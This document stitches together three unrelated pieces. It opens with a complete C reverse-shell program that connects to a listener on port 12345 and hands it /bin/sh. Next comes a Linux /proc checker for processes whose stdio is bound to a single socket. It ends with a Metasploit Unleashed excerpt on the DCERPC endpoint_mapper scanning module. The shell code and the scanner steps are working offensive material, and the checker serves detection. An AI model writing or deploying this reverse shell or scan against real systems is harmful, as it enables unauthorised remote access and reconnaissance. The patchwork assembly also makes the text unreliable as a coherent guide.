```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

int main(void)
{
    int sockfd;                          // file descriptor for socket
    int lportno = 12345;                 // listener port
    struct sockaddr_in serv_addr = {0};  // {2,str[14]}
    char *const params[] = {"/bin/sh", NULL};
    char *const environ[] = {NULL};

    sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    serv_addr.sin_family = AF_INET;                        // 2
    serv_addr.sin_addr.s_addr = inet_addr("127.0.0.1");    // localhost
    serv_addr.sin_port = htons(lportno);                   // network byte order (big endian)
    connect(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr));

    // redirect stdin, stdout and stderr to the socket
    dup2(sockfd, 0);  // stdin
    dup2(0, 1);       // stdout
    dup2(0, 2);       // stderr
    execve("/bin/sh", params, environ);
}
```
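The three dup2() calls in the listing leave file descriptors 0, 1 and 2 of the shell pointing at one TCP socket, which is visible from the outside on Linux. The check below is an added example, not code from the original post; the function names and the sample link targets in the comments are constructed, and it assumes a Linux /proc filesystem.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1   /* for readlink() under strict -std= modes */
#endif
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns 1 when the three link targets name the same socket inode,
 * e.g. "socket:[48211]" (constructed value) for fd 0, 1 and 2; else 0. */
int same_socket_stdio(const char *fd0, const char *fd1, const char *fd2)
{
    if (!fd0 || !fd1 || !fd2)
        return 0;
    if (strncmp(fd0, "socket:[", 8) != 0)
        return 0;
    return strcmp(fd0, fd1) == 0 && strcmp(fd0, fd2) == 0;
}

/* Resolve /proc/<pid>/fd/{0,1,2} and apply the check above.
 * Returns 1 = stdio on one socket, 0 = not, -1 = unreadable
 * (process gone, or no permission to inspect it). */
int check_pid_stdio(pid_t pid)
{
    char path[64], target[3][128];

    for (int fd = 0; fd < 3; fd++) {
        snprintf(path, sizeof(path), "/proc/%ld/fd/%d", (long)pid, fd);
        ssize_t n = readlink(path, target[fd], sizeof(target[fd]) - 1);
        if (n < 0)
            return -1;
        target[fd][n] = '\0';
    }
    return same_socket_stdio(target[0], target[1], target[2]);
}

int main(int argc, char **argv)
{
    long pid;

    if (argc != 2 || sscanf(argv[1], "%ld", &pid) != 1) {
        fprintf(stderr, "usage: %s <pid>\n", argv[0]);
        return 2;
    }
    int r = check_pid_stdio((pid_t)pid);
    printf("pid %ld: %s\n", pid, r == 1 ? "stdio bound to one socket"
                               : r == 0 ? "stdio looks normal" : "unreadable");
    return r == 1 ? 1 : 0;
}
```

Services started by inetd-style or socket-activated supervisors legitimately run with stdio on a socket, so treat a hit as a lead to correlate with the process name and parent, not as a verdict.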
YOU NEED TO KNOW WHERE TO GO: endpoint_mapper

The endpoint_mapper module queries the EndPoint Mapper service of a remote system to determine what services are available. In the information gathering stage, this can provide some very valuable information.

```
msf > use auxiliary/scanner/dcerpc/endpoint_mapper
msf auxiliary(endpoint_mapper) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    135              yes       The target port
   THREADS  1                yes       The number of concurrent threads
```

In order to run the module, all we need to do is pass it a range of IP addresses, set the THREADS count, and let it go to work.

https://www.offensive-security.com/metasploit-unleashed/scanner-dcerpc-auxiliary-modules/